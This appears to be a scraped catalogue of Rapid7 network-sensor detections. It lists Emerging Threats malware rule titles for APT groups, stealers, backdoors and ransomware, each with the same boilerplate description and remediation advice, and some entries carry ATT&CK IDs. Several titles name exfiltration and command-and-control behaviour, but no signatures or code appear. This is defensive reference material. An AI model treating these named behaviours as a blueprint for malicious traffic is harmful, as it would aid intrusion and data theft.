This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT28/SkinnyBoy Payload Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT28/Sofacy Zebrocy Go Variant Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT28/Sofacy Zebrocy Go Variant CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT28/Sofacy Zebrocy Go Variant Downloader Error POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT28/Sofacy Zebrocy Secondary Payload CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT28 Uploader Variant CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE APT28 Uploader Variant Fake Request to Google

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT28 Zebrocy/Zekapab Reporting to CnC M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT29 Cache_DLL SSL Cert

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT29 Implant8 - Evil Twitter Callback

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT29 Implant8 - MAL_REFERER

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT29/Wellness CnC Host Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT32 Win32/Ratsnif CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT32 Win32/Ratsnif POSTing Log Message to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT32 Win32/Ratsnif Requesting Command from CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT32 Win32/Ratsnif Submitting Output of Command to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT33/CharmingKitten Encrypted Payload Inbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT33/CharmingKitten JS/HTA Stage 1 CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT33/CharmingKitten Retrieving New Payload (flowbit set)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT34 TONEDEAF 2.0 Requesting Commands from CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT34 TONEDEAF 2.0 Uploading to CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT39/Chafer Payload - CnC Checkin M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT39/Chafer Payload - CnC Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT.Agtid callback

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT Backspace CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE APT/Bitter Maldoc Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT-C-23 Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT-C-23 Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT Cheshire Cat CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE APT CozyCar SSL Cert 2

Description

Recommendation

ET MALWARE APT CozyCar SSL Cert 5

Description

Recommendation

ET MALWARE APT CozyCar SSL Cert 6

Description

Recommendation

ET MALWARE APT CozyCar SSL Cert 7

Description

Recommendation

ET MALWARE APT CozyCar SSL Cert 8

Description

Recommendation

ET MALWARE APT/Donot Group Checkin Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT/FamousSparrow Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT.Fwits CnC Beacon M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE APT.Fwits CnC Beacon M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE APT Hellsing Proxy Checker Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT Lazarus Nukesped Downloader

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT LuckyMouse Polpo Malware CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT LuckyMouse Polpo Malware CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT LuckyMouse Polpo Malware CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT Lurker POST CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE APT Mustang Panda Payload - CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT_NGO_wuaclt

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT_NGO_wuaclt C2 Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT Operation Sidecopy lnk Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT OSX.XSLCmd CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE APT/TransparentTribe CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE APT/TransparentTribe Style Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arbitrium-RAT CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arbitrium-RAT Observed User-Agent (JustKidding)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ArcDoor Intial Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ArcDoor User-Agent (ALIZER)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ares Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arid Viper APT Advtravel Campaign GET Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arid Viper APT Checkin 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arid Viper APT Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arid Viper APT Checking filename

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arid Viper APT Exfiltrating files

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arid Viper APT File information

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arid Viper APT Possible User-Agent (SK)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arid Viper APT Possible User-Agent (Skype)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arid Viper APT Possible User-Agent (Skypee)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arid Viper APT Transmitting Date

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arid Viper APT Transmitting Serial

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AridViper CnC Domain in SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arkei Stealer Config Download Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Arkei Stealer IP Lookup

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ARM Binary Requested via WGET to Known IoT Malware Domain

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ArrobarLoader CnC Checkin M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ArtraDownloader CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ArtraDownloader/TeleRAT Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ASNAROK Domain in TLS SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Asprox Data Post to C&C

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Asprox Form Submission to C&C

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Asterope Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AstroBot CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Athena DDoS Bot Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Atya Dropper Possible Rootkit - HTTP GET

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Aura Ransomware User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Aurora/OneKeyLocker Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Aurora Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE AutoHotkey Downloader Checkin via IPLogger

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AutoHotKey offthewall Downloader Requesting Payload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Aveo C2 Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Aveo C2 Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Aveo Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Avzhan DDoS Bot User-Agent MyIE

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AZORult v3.2 Server Response M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AZORult v3.2 Server Response M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AZORult v3.2 Server Response M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AZORult v3.3 Server Response M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AZORult v3.3 Server Response M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AZORult v3.3 Server Response M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE AZORult Variant.4 Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Babar POST Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Babax Stealer Exfil via Telegram

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BabyShark CnC Domain in SNI

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE BACKCONFIG CnC Downloader Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Darpapox/Jaku Initial C2 Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Egobot Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Elise CnC Beacon 1 M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Backdoor.Elise CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Backdoor.Elise CnC Beacon 2 M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Backdoor.Elise CnC Beacon 3 M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Backdoor.Elise CnC Beacon 3 M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Backdoor.Elise Style IP Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Elise Style IP Check M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Esion CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Graybird Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Irc.MFV User Agent Detected (IRC-U)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor Lanfiltrator Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Meciv Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.TurlaCarbon.A C2 HTTP Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Agent.bjjv Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Agent.myttae User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Aldibot.A Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32.Aldibot.A User-Agent (Aldi Bot)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Backdoor.Win32/Etumbot.B Requesting RC4 Key

Description

